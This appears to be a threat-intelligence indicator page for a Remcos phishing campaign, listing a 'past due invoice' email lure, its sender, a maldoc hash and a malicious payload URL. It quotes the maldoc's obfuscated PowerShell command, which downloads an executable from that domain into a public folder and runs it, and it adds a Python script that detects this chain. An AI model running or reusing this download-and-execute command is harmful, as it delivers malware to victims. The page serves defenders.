Remcos IOCs
https://github.com/executemalware/Malware-IOCs/blob/main/2021-10-11%20Remcos%20IOCs

THREAT IDENTIFICATION: REMCOS

SUBJECTS OBSERVED
PAST DUE INVOICE

SENDERS OBSERVED
sejongkj@daum.net

EMAIL BODY
Good afternoon,
I need to confirm the following
Attached find past due invoice details for your records,
Kind regards,

MALDOC FILE HASHES
PAST DUE INVOICE.xls
092fd1fae341ede766b93f694c4ea0bf

POWERSHELL FROM MALDOC
C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Public\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe

PAYLOAD URL
http://thepunchlineexpose.com/Manager/AnyDesk.exe

REMCOS C2
No C2 traffic observed - the payload URL was 404

SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/browse.php?search=thepunchlineexpose.com
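As an added example (not part of the paste or the executemalware repository), the Python below undoes the backtick escaping used in the maldoc command line above (htt`p, e`xe) and then applies defensive heuristics for the same chain: hidden window, sleep delay, Start-BitsTransfer download into C:\Users\Public, and execution of the dropped file. The sample is the page's command with the prompt dropped; the function names are my own.

```python
import re

# Backtick escapes PowerShell actually interprets; any other backtick-char pair
# is just the char, which is why htt`p and e`xe still run as http and exe.
_PS_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0", "a": "\a", "b": "\b", "f": "\f", "v": "\v"}

# The maldoc command line recorded on this page, with the analyst prompt removed.
SAMPLE = (r"powershell -w hi sleep -Se 31;Start-BitsTransfer -Source "
          r"htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination "
          r"C:\Users\Public\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe")


def normalize_powershell(cmd: str) -> str:
    """Collapse backtick escapes so plain string rules see the real text."""
    return re.sub(r"`(.)", lambda m: _PS_ESCAPES.get(m.group(1), m.group(1)), cmd)


def _param(tokens, name):
    """Value of a parameter given by any prefix of its name (-Sou for -Source, -w for -WindowStyle)."""
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] == "-" and len(tok) > 1 and name.lower().startswith(tok[1:].lower()):
            return tokens[i + 1]
    return None


def triage_command(cmd: str) -> dict:
    """Heuristics for the chain seen in the maldoc: hidden window, delay,
    BITS download into a world-writable folder, then running the dropped file."""
    plain = normalize_powershell(cmd)
    tokens = re.split(r"[\s;]+", plain.strip())
    lower = [t.lower() for t in tokens]
    f = {"obfuscated": plain != cmd, "hidden_window": False, "delay": False,
         "download": None, "public_staging": False, "executes_download": False}
    style = _param(tokens, "WindowStyle")
    f["hidden_window"] = bool(style) and "hidden".startswith(style.lower())
    f["delay"] = any(t in ("sleep", "start-sleep") for t in lower)
    if "start-bitstransfer" in lower:
        rest = tokens[lower.index("start-bitstransfer"):]
        src, dst = _param(rest, "Source"), _param(rest, "Destination")
        if src and dst:
            f["download"] = (src, dst)
            f["public_staging"] = dst.lower().startswith(r"c:\users\public")
            # the same path appearing again as its own token means it is invoked
            f["executes_download"] = lower.count(dst.lower()) >= 2
    return f


if __name__ == "__main__":
    print(triage_command(SAMPLE))
```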